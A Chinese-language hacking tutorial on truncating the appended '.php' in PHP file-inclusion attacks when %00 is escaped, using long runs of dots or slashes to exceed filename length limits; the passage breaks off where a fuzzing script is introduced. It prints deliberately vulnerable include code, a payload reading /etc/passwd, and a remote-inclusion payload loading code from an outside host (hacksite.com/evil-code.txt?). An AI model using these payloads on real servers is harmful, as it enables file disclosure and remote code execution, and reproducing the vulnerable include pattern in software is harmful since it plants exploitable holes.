突破限制截断后面的字符串技巧
利用本地包含时常常需要用%00来截断后面的字符串,但在GPC为ON时%00是会被转义的,那么还有其他方法么?
用一定数量的/突破操作系统对文件名的长度限制来截断后面的字符串(推测相对路径可用)
看漏洞代码:
$webpath = dirname(__FILE__)."/";
$filepath = "test.txt";
for($i =1;$i<1000;$i++){
$filepath .= '.';
}
include $webpath.$filepath.".php";
?>
test.txt 代码:<?php die('OK');?>
结果截断失败,改下代码:
$webpath = dirname(__FILE__)."/";
$filepath = "test.txt";
for($i =1;$i<1000;$i++){
$filepath .= '.';
}
include $filepath.".php"; //相对路径
?>
这次成功。
以上是windows下的方法,其实linux也可以:
$a='';
for($i=0;$i<=4071;$i++) {
$a .= '/';
}
$a = 'test.txt'.$a; //完整的路径为/var/www/test/test.txt
require_once($a.'.php');
?>
include截断
include $_GET['action'].".php"; ?>
提交“action=/etc/passwd%00”中的“%00”将截断后面的“.php”,但是除了“%00”还有没有其他的字符可以实现截断使用呢?
肯定有人想到了远程包含的url里问号“?”的作用,通过提交“action=http://www.hacksite.com/evil-code.txt?”这里“?”实现了“伪截断”:),好象这个看上去不是那么舒服那么我们简单写个代码fuzz一下: